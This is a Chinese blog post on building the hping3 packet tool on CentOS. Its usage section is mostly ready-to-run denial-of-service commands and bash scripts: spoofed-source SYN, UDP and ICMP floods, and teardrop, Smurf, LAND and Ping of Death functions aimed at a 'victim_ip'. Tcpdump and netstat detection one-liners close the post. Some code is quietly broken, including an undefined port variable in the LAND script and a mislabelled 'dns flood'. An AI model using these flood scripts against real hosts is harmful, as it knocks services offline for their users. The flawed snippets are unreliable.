CentOS hping3安装和应用

已于 2022-10-20 17:40:27 修改
阅读量2.9k 收藏 10
点赞数 2
分类专栏: linux 工具 文章标签: centos linux 服务器
于 2022-10-17 17:00:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/feifei000131/article/details/127362597
版权

CentOS hping3安装和应用

CentOS 安装hping3工具

CentOS 安装 hping3 工具!

安装libpcap,libpcap-devel,tcl和tcl-devel

yum -y install libpcap libpcap-devel tcl tcl-devel
  • 如果找不到包,从光盘映像文件下找到这三个rpm包,手动安装 rpm -ivh filename.rpm(忽略版本)
rpm -ivh '/root/Desktop/tcl-8.5.7-6.el6.x86_64.rpm' 
rpm -ivh '/root/Desktop/tcl-devel-8.5.7-6.el6.x86_64.rpm'
rpm -ivh '/root/Desktop/libcap-devel-2.16-5.5.el6.x86_64.rpm' 
rpm -ivh '/root/Desktop/libpcap-1.4.0-1.20130826git2dbcaa1.el6.x86_64.rpm'

hping安装

//确定pcap-bpf.h是否存在/usr/include/下,如果不存在,跳过这步,在下面libpcap-1.1.1.tar.gz的解压包中复制过来
ln -s /usr/include/pcap-bpf.h /usr/include/net/bpf.h 

wget http://www.hping.org/hping3-20051105.tar.gz
tar zxvf hping3-20051105.tar.gz
cd hping3-20051105

./configure
make
make install

出错后问题解决

configure 时候出错

  • error can not find the byte order for this architecture, fix bytesex.h
    原因:
    没有指定 x86_64 下的大小端对齐。
  • 解决方法:
    修改 bytesex.h,在 defined(i386) 后添加 defined(x86_64)。

修改前

#if 	defined(__i386__) \
	|| defined(__alpha__) \
	|| (defined(__mips__) && (defined(MIPSEL) || defined (__MIPSEL__)))

修改后

#if 	defined(__i386__) \
	|| defined(__x86_64__) \
	|| defined(__alpha__) \
	|| (defined(__mips__) && (defined(MIPSEL) || defined (__MIPSEL__)))

make找不到pcap.h

  • 下载libpcap-1.1.1.tar.gz
http://www.tcpdump.org/release/libpcap-1.1.1.tar.gz
tar zxvf libpcap-1.1.1.tar.gz
cd libpcap-1.1.1
./configure
  • 然后把libcap-1.9.1/pcap/中的复制到/usr/include/中或者把路径添加到环境变量
sudo cp pcap.h /usr/include/

export C_INCLUDE_PATH=&C_INCLUDE_PATH:头文件
source /etc/profile
echo $C_INCLUDE_PATH

找不到pcap.h

  • 添加软连接 /usr/include/net/bpf.h。
ln -sf /libpcap-1.1.1/pcap-bpf.h /usr/include/net/bpf.h

-ltcl -lm -lpthread

ln -sf libpcap.so.1.4.0 /usr/lib64/libpcap.so.1

hping3工具的使用

端口扫描

  • 通过 eth0 网口,发送 SYN 报文 到 192.168.1.12:8080
hping3 -I eth0 -S 192.168.1.12 -p 8080

syn flood

  • 默认协议: tcp; 默认源端口:随机; 默认源地址:攻击机的 ip 地址
通过 eth0 网口。发送 SYN 报文 到 192.168.1.12:8080。伪造源地址为192.168.1.222,时间间隔 1000us。
hping3 -I eth0 -S 192.168.1.12 -p 8080 -a 192.168.1.222 -i u1000

通过 eth0 网口。发送 SYN 报文 到 192.168.1.12:8080。伪造随机源地址,时间间隔 1000us。
hping3 -I eth0 -S 192.168.1.12 -p 8080 --rand-source -i u1000

通过 eth0 网口。发送 SYN 报文 到 192.168.1.12:8080。伪造随机源地址,洪水攻击。
洪水攻击,速率最快的攻击。不会显示数据 和 丢包的统计。
hping3 -I eth0 -S 192.168.1.12 -p 8080 --rand-source --flood

udp flood

发送 udp 报文 到 192.168.1.12:8080。
hping3 --udp 192.168.1.12 -p 8080

发送 udp 报文 到 192.168.1.12:8080。伪造随机源地址,洪水攻击。
hping3 --udp 192.168.1.12 -p 8080 --rand-source --flood

icmp flood

发送 icmp 报文 到 192.168.1.12。
hping3 --icmp 192.168.1.12

发送 icmp 报文 到 192.168.1.12。伪造随机源地址,洪水攻击。
hping3 --icmp 192.168.1.12 --rand-source --flood

dns flood

发送 udp 报文 到 192.168.1.12:8080。伪造随机源地址,洪水攻击。
hping3 --udp 192.168.1.12 -p 8080 --rand-source --flood

teardrop

  • Teardrop攻击是一种拒绝服务攻击。是基于病态分片数据包的攻击方法。
    其工作原理是向被攻击者发送多个分片的IP包(IP分片数据包中包括该分片数据包属于哪个数据包以及在数据包中的位置等信息)。
    某些操作系统收到含有重叠偏移的伪造分片数据包时将会出现系统崩溃、重启等现象。
#!/bin/bash

function teardrop ( )
{
	local victim_ip=$1
	local id_begin=$2
	local id_end=$3

	for((id=${id_begin};id<${id_end};id++))
	do
		hping3 --icmp ${victim_ip} --data 1000 --id ${id} --count 1 --morefrag
		hping3 --icmp ${victim_ip} --data 200 --id ${id} --count 1 --fragoff 400
	done
}

teardrop $*

SMURF攻击

  • Smurf攻击通过使用将回复地址设置成受害网络的广播地址的ICMP应答请求(ping)数据包,来淹没受害主机,
    最终导致该网络的所有主机都对此ICMP应答请求做出答复,导致网络阻塞。
    更加复杂的Smurf将源地址改为第三方的受害者,最终导致第三方崩溃。
#!/bin/bash

function smurf ( )
{
	local victim_ip=$1
	local broadcast_ip=$2
	hping3 --icmp ${broadcast_ip} -a ${victim_ip} --flood
}

smurf $*

XMAS TREE攻击

  • TCP所有标志位被设置为1的数据包被称为圣诞树数据包(XMas Tree packet),之所以叫这个名是因为这些标志位就像圣诞树上灯一样全部被点亮。
hping3 -SFRP 192.168.1.12

LAND攻击

  • LAND攻击方式采用了特别构造的TCP SYN数据包(通常用于开启一个新的连接),使目标机器开启一个源地址与目标地址均为自身IP地址的空连接,持续地自我应答,消耗系统资源直至崩溃。这种攻击方法与SYN洪泛攻击并不相同。
 #!/bin/bash

function land ( )
{
	local victim_ip=$1
	hping3 -S ${victim_ip} -p ${victim_port} -a ${victim_ip} --flood
}

land $*

Ping of Death攻击

  • Ping of Death攻击原理是攻击者A向受害者B发送一些尺寸超大的ICMP(Ping命令使用的是ICMP报文)报文对其进行攻击(对于有些路由器或系统,在接收到一个这样的报文后,由于处理不当,会造成系统崩溃、死机或重启)。
#!/bin/bash

function ping_of_death ()
{
	local victim_ip=$1
	local id=186
	local data_size=1450
	let icmp_size=${data_size}+8
	hping3 --icmp ${victim_ip} --data ${data_size} --id ${id} --count 1 --morefrag 

	for i in $(seq 50)
	do
		let offset=${i}*${icmp_size}
		hping3 --icmp ${victim_ip} --data ${data_size} --id ${id} --count 1 --morefrag --fragoff $offset
	done
}

ping_of_death $*

抓包验证

01、抓取所有网络包,并在terminal中显示抓取的结果,将包以十六进制的形式显示。
tcpdump 
02、抓取所有的网络包,并存到 result.cap 文件中。
tcpdump -w result.cap
03、抓取所有的经过eth0网卡的网络包,并存到 result.cap 文件中。
tcpdump -i eth0 -w result.cap
04、抓取源地址是192.168.1.100的包,并将结果保存到 result.cap 文件中。
tcpdump src host 192.168.1.100 -w result.cap 
05、抓取地址包含是192.168.1.100的包,并将结果保存到 result.cap 文件中。
tcpdump host 192.168.1.100 -w result.cap 
06、抓取目的地址包含是192.168.1.100的包,并将结果保存到 result.cap 文件中。
tcpdump dest host 192.168.1.100 -w result.cap 
07、抓取主机地址为 192.168.1.100 的数据包
tcpdump -i eth0 -vnn host 192.168.1.100
08、抓取包含192.168.1.0/24网段的数据包
tcpdump -i eth0 -vnn net 192.168.1.0/24
09、抓取网卡eth0上所有包含端口22的数据包
tcpdump -i eth0 -vnn port 22
10、抓取指定协议格式的数据包,协议格式可以是「udp,icmp,arp,ip」中的任何一种,例如以下命令:
tcpdump udp  -i eth0 -vnn
11、抓取经过 eth0 网卡的源 ip 是 192.168.1.100 数据包,src参数表示源。
tcpdump -i eth0 -vnn src host 192.168.1.100
12、抓取经过 eth0 网卡目的 ip 是 192.168.1.100 数据包,dst参数表示目的。
tcpdump -i eth0 -vnn dst host 192.168.1.100
13、抓取源端口是22的数据包
tcpdump -i eth0 -vnn src port 22
14、抓取源ip是 192.168.1.100 且目的ip端口是22的数据包
tcpdump -i eth0 -vnn src host 192.168.1.100 and dst port 22
15、抓取源ip是192.168.1.100或者包含端口是22的数据包
tcpdump -i eth0 -vnn src host 192.168.1.100 or port 22
16、抓取源ip是192.168.1.100且端口不是22的数据包
tcpdump -i eth0 -vnn src host 192.168.1.100 and not port 22
17、抓取源ip是192.168.1.100且目的端口是22,或源ip是192.168.1.102且目的端口是80的数据包。
tcpdump -i eth0 -vnn ( src host 192.168.1.100 and dst port 22 ) or ( src host 192.168.1.102 and dst port 80 )
18、把抓取的数据包记录存到/tmp/result文件中,当抓取100个数据包后就退出程序。
tcpdump –i eth0 -vnn -w /tmp/result -c 100
19、从/tmp/result记录中读取tcp协议的数据包
tcpdump -i eth0  tcp  -vnn -r /tmp/result
20、想要截获所有192.168.1.100 的主机收到的和发出的所有的数据包:
tcpdump host 192.168.1.100
21、如果想要获取主机192.168.1.100除了和主机192.168.1.101之外所有主机通信的ip包,使用命令:
tcpdump ip host 192.168.1.100 and ! 192.168.1.101
22、如果想要获取主机 192.168.1.100 接收或发出的 telnet 包,使用如下命令:
tcpdump tcp port 23 host192.168.1.100

shell检测攻击数量

SYN Flood攻击检测

netstat -nt |grep SYN_RECV |awk '/^tcp/{sub(/:.*/,"",$4);sub(/:.*/,"",$5);if($4!=$5){print $4,$5}}' |wc -l

UDP Flood攻击检测

netstat -nua |wc -l

Lood攻击检测

netstat -nt |grep SYN_RECV |awk '/^tcp/{sub(/:.*/,"",$4);sub(/:.*/,"",$5);if($4==$5){print $4,$5}}' |wc -l

ICMP Flood攻击检测

netstat -s | grep "ICMP messages received" | awk '{print $1}'
王相斐
关注
  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DDoS攻击、CC攻击的攻击方式和防御方法
12-11
DDoS 是英文 Distributed Denial of Service 的缩写,意即“分布式拒绝服务”
DDOS攻击hping安装及使用
新雪兰
12-17 3292
1、下载安装包 http://www.hping.org/download.html 安装步骤 : 1、安装依赖项 yum install -y gcc libpcap libpcap-devel tcl tcl-devel ln -sf /usr/include/pcap-bpf.h /usr/include/net/bpf.h 2、 tar -zxvf hping3-20...
[Kali系列] 使用Kali的自带工具hping3进行SYN FLOOD
最新发布
trdtyvu的博客
06-18 706
本实验旨在简单介绍下使用kali的自带工具hping3进行SYN FLOOD(属于典型的DOS/DDOS攻击)测试攻击,实验环境均在VMware虚拟机内,并无涉及真实IP地址。若因传播或利用本文所提供的信息而造成任何直接或间接的后果,均由使用者本人负责,作者不为此承担任何责任!通过本次实验,验证了使用hping3进行高级SYN Flood攻击的有效性,并观察了其对目标系统的影响。SYN Flood攻击能迅速占用目标系统的网络连接资源和CPU资源,导致服务不可用。
hping3安装使用
java技术博客
07-22 3936
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-bEm4ipDE-1658473654885)(…–flood指定发包速率,尽可能按最快速度发,不用回应。192.168.46.4安装了nginx服务。–faster指定发包速率,每秒100个。-0原始ip模式,即RAWSOCKET。-d指定data数据大小,默认为0。-s使用指定的源端口,默认是随机的。-t指定ttl值,默认为64。-w指定数据包大小,默认为64。-I指定所使用的网卡接口。......
hping3拒绝服务攻击工具
zero
05-07 1032
hping3官网地址 CentOS7安装hping3 # 安装依赖 yum install gcc.x86_64 libpcap-devel.x86_64 tcl-devel -y # 下载安装包 wget http://www.hping.org/hping3-20051105.tar.gz tar -xf hping3-20051105.tar.gz && cd hping3-20051105 # 编译安装 ./configure # 此时报错如下 [外链图片转存失败,源站可能有防
kail2.0下hping3的安装和使用
nextdoor6的博客
05-11 5319
第一部分,hping2的安装 0x01 首先是libpcap的安装 如果安装bison依赖包 运行如下命令 apt-get install bison 需要安装flex-2.6.0安装包,版本其他应该可以 下载地址 http://flex.sourceforge.net/ 执行命令如下 tar  -xvf   flex-2.6.0.tar.b
Centos离线安装zip和unzip
02-28
一些情况下, 服务器不联网, 则安装一些常用的命令比较麻烦, 本资源提供 Centos 离线安装 zip 和 unzip 命令和安装方法, 文件包含 unzip-6.0-21.el7.x86_64.rpm 和 zip-3.0-11.el7.x86_64.rpm以及安装命令。
Centos7下安装MongoDB
08-24
Centos7下安装MongoDB是指在Centos7操作系统中安装和配置MongoDB数据库的过程。MongoDB是一个基于分布式文件存储的NoSQL数据库,由C++语言编写,运行稳定,性能高旨在为 WEB 应用提供可扩展的高性能数据存储解决方案...
centos7离线安装postgres10和postgis
08-21
下面我们将详细介绍如何在CentOS 7上离线安装PostgreSQL 10和PostGIS。 首先,你需要准备一个包含所有必需软件包的压缩文件,如"centos7离线安装postgres10"。这个压缩包应该包括以下内容: 1. PostgreSQL 10的RPM...
centos7离线安装python3
11-22
centos7离线安装python3
centos7下安装python3和ipython3
09-12
详细记录了在centos7下如何用安装python3和ipython3的过程,简单实用,傻瓜式操作,期间遇到的所有问题都给出明确的解决办法。复制代码,黏贴运行即可。为新手在centos7环境下配置python学习环境提供帮助。
hping3安装及使用
ASDF的博客
05-05 8273
hping3可以用来进行SYN_FLOOD、ACK_FLOOD、ICMP_FLOOD,是一个非常好用的工具 hping3安装见:hping3 攻击部分可以看这几篇: hping3实现SYN FLOOD 攻击 hping网络安全工具的安装及使用 hping3使用
使用hping3进行Dos攻击实验(安装+攻击保姆级教程)
m0_74806866的博客
12-02 5261
hping3的安装和使用进行了一个简单的介绍,和一个简单的攻击实验
CentOS hping3安装
weixin_38070782的博客
06-05 993
安装libpcap-devel和tcl-devel yum -y install libpcap-devel tcl-devel 从github上clone源代码 git clone https://github.com/antirez/hping.git 运行配置脚本 cd hping ./configure 编译 make 安装 make install hping3 SYN洪流攻击 hping3 --rand-source [dst_ip] -p [dst_port]
hping3的编译和安装
Blue summer的博客
10-28 5944
注:本次安装基于SUSE11SP3系统1、获取hping3源码包:http://www.hping.org/download.html ,我下载的是hping3-20051105.tar.gz这个版本。2、将压缩包放到系统上使用tar命令解压。tar -xf hping3-20051105.tar.gz3、进入解压后的目录,执行./configure && make执行后有以下报错:main.c:2
centos 7下hping3的编译安装和测试
yangrendong的专栏
04-01 5284
最新由于调试测试ipv4到ipv6过渡技术中的map技术需要,需要一个工具模拟发送icmp、tcp和udp的ipv4报文,尤其是分片报文,可是环境所限,没有接入思博伦测试仪,所以我就想到了hping3测试工具。 1.hping3下载: hping的工具官方网站是http://www.hping.org/download.html,大家可以到官方网站溜达一圈看看,...
十几个免费好用的抓包工具
Merissa_的博客
05-05 6582
此工具用于防火墙和IDS的渗透测试,但你可以在网络中使用此工具来查找安全错误。你还可以设置数据包数量和数据包之间的延迟,还可以在此工具中修改各种数据包内容。Scapy是一个值得尝试的工具。您可以执行各种任务,包括扫描,跟踪,探测,单元测试,网络发现。如果你是网络管理员,你可以使用此工具来测试你的网络。Libtins也是一个很好的工具,用于制作,发送,嗅探和解析网络数据包。HPing可用于各种平台,包括Windows,MacOs X,Linux,FreeBSD,NetBSD,OpenBSD和Solaris。
CentOS 安装hping3工具及安装遇到的错误及解决方法
weixin_72426331的博客
10-22 1288
是用于生成和解析TCPIP协议数据包的开源工具。创作者是Salvatore Sanfilippo。目前最新版是hping3,支持使用tcl脚本自动化地调用其API。hping是安全审计、防火墙测试等工作的标配工具。它不仅能发送 ICMP 回应请求,它还可以支持 TCP、UDP、ICMP 和 RAW-IP 协议,它有一个路由跟踪模式,能够在两个相互包含的通道之间传送文件。
centos9 安装和配置php应用程序
05-16
CentOS 9目前还没有正式发布,最新的版本是CentOS 8,以下是在CentOS 8上安装和配置PHP应用程序的步骤: 1. 安装PHP 在终端输入以下命令: ``` sudo dnf install php php-cli php-common php-mysqlnd php-mbstring php-xml ``` 2. 配置PHP 修改PHP配置文件,在终端输入以下命令: ``` sudo vi /etc/php.ini ``` 找到以下行并修改: ``` display_errors = Off ``` 改为: ``` display_errors = On ``` 保存并退出。 3. 安装Web服务器 可以选择Apache或Nginx作为Web服务器。以Apache为例,在终端输入以下命令: ``` sudo dnf install httpd ``` 4. 配置Web服务器 修改Apache配置文件,在终端输入以下命令: ``` sudo vi /etc/httpd/conf/httpd.conf ``` 找到以下行并修改: ``` DocumentRoot "/var/www/html" <Directory "/var/www/html"> ``` 改为: ``` DocumentRoot "/path/to/your/application" <Directory "/path/to/your/application"> ``` 保存并退出。 5. 启动Web服务器 在终端输入以下命令启动Apache: ``` sudo systemctl start httpd ``` 6. 测试PHP应用程序 在浏览器中输入服务器IP地址或域名,应该能够看到PHP应用程序的主页。 以上是在CentOS 8上安装和配置PHP应用程序的基本步骤,具体配置可能因应用程序而异。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值